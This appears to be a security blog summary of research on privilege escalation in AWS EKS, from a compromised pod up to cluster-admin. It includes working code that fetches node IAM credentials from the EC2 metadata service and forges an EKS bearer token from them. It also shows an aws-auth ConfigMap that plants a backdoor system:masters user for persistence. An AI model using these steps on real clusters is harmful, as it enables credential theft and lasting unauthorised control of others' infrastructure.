Privilege escalation in AWS Elastic Kubernetes Service (EKS)
Nothing too crazy here; it's well known that if someone can compromise something running within an AWS Elastic Kubernetes Service (EKS) pod, they can use that access to hit the AWS EC2 Metadata Service and obtain the node's IAM token. There has been some prior research on performing a denial of service by removing a network interface with that token, but the author An Trinh here takes a look at going for a more significant privilege escalation.
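In practice, that first hop is just HTTP requests to the link-local metadata address. A minimal sketch of the requests involved, using only the Python standard library (the role name is a placeholder, and actually sending these obviously only works from inside a pod on an EC2-backed node):

```python
import urllib.request

IMDS = "http://169.254.169.254/latest"

def imds_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """IMDSv2 first requires a session token, fetched with a PUT request."""
    return urllib.request.Request(
        f"{IMDS}/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def credentials_request(role_name: str, session_token: str) -> urllib.request.Request:
    """The node's temporary IAM credentials live under this well-known path."""
    return urllib.request.Request(
        f"{IMDS}/meta-data/iam/security-credentials/{role_name}",
        headers={"X-aws-ec2-metadata-token": session_token},
    )

# From inside a pod you would send these with urllib.request.urlopen();
# the JSON response contains AccessKeyId, SecretAccessKey, and Token.
```

Listing `/latest/meta-data/iam/security-credentials/` without a role name returns the attached role's name, so an attacker does not need to know it in advance.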
The path they discovered was the usual pod -> metadata -> IAM token route. The IAM token can then be exchanged back with Kubernetes for a token with the system:node role within the cluster. If, as is the case in many instances, the cluster randomly assigns pods to nodes, there is the possibility of a privileged pod running on the same node as the compromised pod (the node you now hold system:node on). If there is one, the system:node token can be used to impersonate the privileged pod and potentially gain cluster-admin privileges (if that is what the privileged pod had). This does depend on the cluster not enforcing any separation over which nodes privileged pods run on, but it should work in a fair number of situations, so it's worth being aware of.
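The exchange in the other direction works because an EKS bearer token is essentially a presigned STS GetCallerIdentity URL, base64-encoded behind a "k8s-aws-v1." prefix. A rough stdlib-only sketch of how such a token is assembled from the IAM credentials (the keys, region, and cluster name below are dummies; AWS will only accept the signature when real credentials are used):

```python
import base64
import datetime
import hashlib
import hmac
import urllib.parse

def _sign(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()

def eks_bearer_token(access_key: str, secret_key: str, session_token: str,
                     cluster_name: str, region: str = "us-east-1") -> str:
    """Build a 'k8s-aws-v1.' bearer token: a SigV4-presigned GetCallerIdentity URL."""
    host = f"sts.{region}.amazonaws.com"
    now = datetime.datetime.now(datetime.timezone.utc)
    amz_date = now.strftime("%Y%m%dT%H%M%SZ")
    datestamp = now.strftime("%Y%m%d")
    scope = f"{datestamp}/{region}/sts/aws4_request"
    params = {
        "Action": "GetCallerIdentity",
        "Version": "2011-06-15",
        "X-Amz-Algorithm": "AWS4-HMAC-SHA256",
        "X-Amz-Credential": f"{access_key}/{scope}",
        "X-Amz-Date": amz_date,
        "X-Amz-Expires": "60",
        # The cluster name rides along as an extra signed header.
        "X-Amz-SignedHeaders": "host;x-k8s-aws-id",
        "X-Amz-Security-Token": session_token,
    }
    canonical_query = "&".join(
        f"{urllib.parse.quote(k, safe='')}={urllib.parse.quote(v, safe='')}"
        for k, v in sorted(params.items())
    )
    canonical_request = "\n".join([
        "GET", "/", canonical_query,
        f"host:{host}\nx-k8s-aws-id:{cluster_name}\n",
        "host;x-k8s-aws-id",
        hashlib.sha256(b"").hexdigest(),  # empty request body
    ])
    string_to_sign = "\n".join([
        "AWS4-HMAC-SHA256", amz_date, scope,
        hashlib.sha256(canonical_request.encode()).hexdigest(),
    ])
    key = _sign(_sign(_sign(_sign(("AWS4" + secret_key).encode(),
                                  datestamp), region), "sts"), "aws4_request")
    signature = hmac.new(key, string_to_sign.encode(), hashlib.sha256).hexdigest()
    url = f"https://{host}/?{canonical_query}&X-Amz-Signature={signature}"
    return "k8s-aws-v1." + base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")
```

Presenting that string as a bearer token to the Kubernetes API server lets EKS resolve it back to the node's IAM identity, which is what yields the system:node mapping described above.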
The author also notes a persistence technique. EKS is able to facilitate mapping between AWS identities and EKS privileges. This works by hooking into the Kubernetes API and calling the AWS STS endpoint with the EKS token. Calling STS identifies the AWS identity behind the token, and a configuration mapping translates AWS role ARNs into Kubernetes roles. As such, one could plant a user with high privileges into the configuration mapping. These privileges exist independently of the privileges actually held within AWS, so even removing all permissions from the user would not remove their cluster-admin access within Kubernetes.
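As a sketch of what planting such a mapping could look like, assuming the standard aws-auth ConfigMap that EKS keeps in the kube-system namespace (the account ID and user name here are hypothetical):

```
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapUsers: |
    - userarn: arn:aws:iam::111122223333:user/persisted-user   # hypothetical attacker-controlled identity
      username: persisted-user
      groups:
        - system:masters   # this group is bound to cluster-admin by default
```

Because the mapping only ties an ARN to a Kubernetes group, the IAM user behind it can be stripped of every AWS permission and still authenticate into the cluster with full privileges.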